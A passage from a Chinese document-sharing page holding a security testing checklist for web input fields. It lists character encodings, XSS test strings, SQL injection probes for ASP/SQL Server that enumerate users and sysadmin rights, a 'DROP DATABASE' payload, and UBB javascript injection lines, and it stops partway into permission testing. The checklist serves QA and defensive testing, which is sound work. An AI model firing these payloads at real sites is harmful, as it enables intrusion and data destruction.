安全测试用例word版.docVIP

下载本文档

202
0
约2.38千字
约 3页
2018-05-05 发布于河南
举报
版权申诉

安全测试用例word版.doc

1、原创力文档（book118）网站文档一经付费（服务费），不意味着购买了该文档的版权，仅供个人/单位学习、研究之用，不得用于商业用途，未经授权，严禁复制、发行、汇编、翻译或者网络传播等，侵权必究。。
2、本站所有内容均由合作方或网友上传，本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺！文档内容仅供研究参考，付费前请自行鉴别。如您付费，意味着您自己接受本站规则且自行承担风险，本站不退款、不进行额外附加服务；查看《如何避免下载的几个坑》。如果您已付费下载过本站文档，您可以点击这里二次下载。
3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等，请点击“版权申诉”（推荐），也可以打举报电话：400-050-0827(电话支持时间：9:00-18:30)。
4、该文档为VIP文档，如果想要下载，成为VIP会员后，下载免费。
5、成为VIP后，下载本文档将扣除1次下载权益。下载后，不支持退款、换文档。如有疑问请联系我们。
6、成为VIP后，您将拥有八大权益，权益包括：VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
7、VIP文档为合作方或网友上传，每下载1次，网站将根据用户上传文档的质量评分、类型等，对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档

安全测试用例word版

一. 特殊字符 1. 单个字符： # % ; ‘ “ * ( ) / - 等 2. 特殊字符转义：表一：URL编码特殊字符对应编码空格 %20 “ %22 # %23 $ %24 % %25 %26 ‘ %27 ; %3b %3c = %3d %3e 表二：Unicode编码(Entity Number) 特殊字符对应编码空格 #32; “ #34; # #35; $ #36; % #37; #38; ‘ #39; ; #59; #60; = #61; #62; 表三：Unicode编码(Entity Name) 特殊字符对应编码空格 nbsp; “ quot; amp; lt; gt; 等…… 3. 注意：由于程序会对特殊字符进行转义，在测试特殊字符输入时还要尝试输入文本框规定数量特殊字符，看是否会提示超出规定字数。二. 跨站攻击语句 scriptalert(‘hi’)/script scrscriptiptalert(‘a’)/script scriptalert(‘hi’)/script /scriptscriptalert(‘hi’)/script ’scriptalert(‘hi’)/script style=background:url(javascript:alert(XSS Test Successful)) OA= 三. 注入判断最简单的方法，先收入“’”—— 单引号进行测试，再对比输入 1=1，1=2时是否有不同。 1. 根据不同类型进行注入：数字类型： and char(124)＋user＋char(124)=0 字符类型： ‘ and char(124)＋user＋char(124)=0 and ‘’=’ 搜索类型： ‘ and char(124)＋user＋char(124)=0 and ‘%’=’ 2. post方式常用语句：（以abc.asp?id=80为例） id=80 and user+char(124)=0 id=80’ and user+char(124)=0 and ‘’=’ id=80% and user+char(124)=0 and %= id=80 And 1=1 And = id=80 And 1=2 And = id=80% And 1=1 And %= id=80% And 1=2 And %= 3. 数据库相关： id=999; DROP DATABASE pubs -- （pubs为数据库名） and user0 爆用户名 and user0 and = 爆用户名 and user+char(124)=0 取得当前用户 and 1=(Select IS_MEMBER(db_owner)) 看当前权限 and char(124)＋Cast(IS_MEMBER(db_owner) as varchar(1))＋char(124)=1 ;-- 同上 ;declare @a int-- 是否支持多语句查询 and 1=(select IS_SRVROLEMEMBER(sysadmin));-- 是否为SA权限四. 其他 1. UBB [img]javascript:window.document.write(看不到);[/img] [url=http://[img]javascript:window.document.write(禁止UBB标签和表情);[/img]][img]javascript:window.document.write(禁止UBB标签和表情);[/img][/url] [img]javascript:alert(quot;啊？！quot;);alert(quot;你进来了？？quot;);alert(quot;你为什么要进...quot;);window.location.href=quot;/showpost.aspx?topicid=338998quot;[/img] 五. 权限测试 1. 页面访问权限：假设一个活